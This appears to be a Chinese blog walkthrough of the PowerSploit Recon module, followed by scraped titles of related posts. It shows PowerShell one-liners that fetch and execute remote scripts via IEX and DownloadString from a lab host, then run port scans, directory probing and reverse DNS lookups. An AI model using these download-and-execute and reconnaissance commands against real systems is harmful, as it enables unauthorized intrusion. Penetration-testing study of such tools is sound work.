Recon(信息侦察)模块

a) 调用invoke-Portscan扫描内网主机的端口。

1)通过IEX下载并调用invoke-portscan。

PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Recon/Invoke
-Portscan.ps1")

PS C:\Users\Administrator> Invoke-Portscan -Hosts 192.168.190.132 -Ports "1-65535"

b) 调用Get-HttpStatus扫描目标站点的目录。

1)通过IEX下载并调用Get-HttpStatus。

PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Recon/Get-Ht
tpStatus.ps1")

PS C:\Users\Administrator> Get-HttpStatus -Target www.xxx.com -Path D:\dic.txt

c) 调用Invoke-ReverseDnsLookup扫描内网主机的ip对应的主机名。

1)通过IEX下载并调用Invoke-ReverseDnsLookup。

PS C:\Users\Administrator> IEX(New-Object net.webclient).DownloadString("http://192.168.190.141/PowerSploit/Recon/Invoke
-ReverseDnsLookup.ps1")

PS C:\Users\Administrator> Invoke-ReverseDnsLookup '192.168.190.133'

转载于:https://www.cnblogs.com/-qing-/p/10544271.html

POWERSPLOIT-Recon(信息侦察)脚本渗透实战相关推荐

  1. PowerSploit-CodeExecution(代码执行)脚本渗透实战

    首先介绍一下国外大牛制作的Powershell渗透工具PowerSploit,上面有很多powershell攻击脚本,它们主要被用来渗透中的信息侦察.权限提升.权限维持. 项目地址:https://g ...

  2. 暗月渗透实战靶场-项目六(上)

    暗月渗透实战靶场-项目六 环境搭建 使用的是暗月提供的环境 直接虚拟机运行即可 设置网络环境 网卡配置的时候为了方便直接使用的是暗月的vm19的网卡配置的内网环境 00x1-信息搜集 我们已经知道目标 ...

  3. (Vulnhub练习)-- fristileaks渗透实战

    (Vulnhub练习)-- fristileaks渗透实战 下载地址 http://www.vulnhub.com/entry/fristileaks-13,133/ 目标主机IP:192.168.1 ...

  4. 【渗透实战】web渗透实战,相对高安全级别下,详细分析整个渗透过程以及介绍社工的巧妙性,拿一站得数十站,(漏洞已交)

    ''' 版权tanee 转发交流请备注 漏洞已经提交管理员 关键过程的截图和脚本代码已经略去.希望大家学习技术和思路就好,切勿进行违法犯罪的活动.本实战案例仅作为技术分享,切勿在未经许可的任何公网站点 ...

  5. 【网络安全】2022年第一次靶场渗透实战学习

    一.介绍 渗透测试是通过模拟黑客或者骇客攻击,以评估计算机系统或者网络环境安全性的技术:主要的目的是进行安全性的评估,而不是摧毁或者破坏目标系统. 渗透测试所需要的基础技能必须有网络基础.编程基础.数 ...

  6. 4. Python脚本学习实战笔记四 新闻聚合

    4. Python脚本学习实战笔记四 新闻聚合 本篇名言:"人言纷杂,保持自我:工作勤奋,娱乐适度:对待朋友,不玩心术:处理事务,不躁不怒:生活讲究,量入为出:知足常乐,一生幸福!" ...

  7. 安鸾渗透实战平台综合渗透——SQL注入进阶渗透流程

    本次实验的环境由安鸾渗透实战平台搭建 目标是渗透进网站拿到flag 提示flag在服务器根目录 出于学习目的,由于本人也是小白,错误的地方望指点 参考资料: Call-time pass-by-ref ...

  8. Linux shell 脚本编程-实战篇(三)

    继: Linux shell 脚本编程-实战篇(二) 3. 一些小有意思的脚本 3.1 发送消息 3.1.1 功能分析 对于这种简单的脚本,需要的功能不多.涉及的一些命令很常见,下面了解脚本所需的几个 ...

  9. 渗透实战:dedeCMS任意用户密码重置到内网getshell

    渗透实战:dedeCMS任意用户密码重置到内网getshell ## 一.简介 DedeCMS 是一个基于 PHP 和 MySQL 的开源 CMS 系统,它是国内很多网站使用的 CMS 系统之一.在使 ...

最新文章

  1. 基于requests模块的cookie,session和线程池爬取
  2. ADO.NET Entity Framework
  3. VS.NET 2005真是太好用了!
  4. python字典基础知识点
  5. 前端学习(2047)vue之电商管理系统电商系统之使用cdn优化打包
  6. 创业者谈:畏惧失败,但也要拥抱失败
  7. 怎么进行软件需求分析
  8. 已为此响应调用getwriter()_远程过程调用(RPC)
  9. 【ECG实践篇(1)】MIT-BIH数据库数据解析的方法以及使用rdann获取人工标注注释的方法
  10. 怎样保持下拉菜单截图?如何快速截图截图快捷键
  11. 腾讯Android开发面试记录,附大厂真题面经
  12. rono在oracle的作用_ColorOS产品规划总经理爆料预热Reno,这些功能你想要吗?
  13. JAVA日志记录方法
  14. win10电脑字体突然变得模糊,很细
  15. 最大连接数与每ip连接数的限制
  16. 服务器无线密码是什么原因,有密码为什么连不上wifi
  17. 房地产基础知识!!!
  18. 世界上最远的距离 ——泰戈尔
  19. ReentrantLock
  20. racket android,RacketGhost | F-Droid - Free and Open Source Android App Repository

热门文章

  1. cas引出的ABA问题?如何解决?- 理解原子引用、时间戳(版本号)原子引用
  2. REVERSE-COMPETITION-HGAME2022-Week2
  3. oracle sparc 服务器系统,OracleSPARC服务器基础.PDF
  4. CCIE理论-第一篇-SDN概念复习
  5. 【HDU - 1943】Ball bearings(几何问题)
  6. 【HDU - 3499】 Flight (单源最短路+优惠问题)
  7. 1m带宽可以做mysql数据库吗_服务器的1M带宽够用吗?1M网速是多少?
  8. jsp,div 限制字数,超出部分用省略号代替
  9. 学习笔记10-C语言-小项目-五子棋
  10. 操作系统中避免死锁的银行家算法【表面C++实际C语言】一学就废的菜鸡代码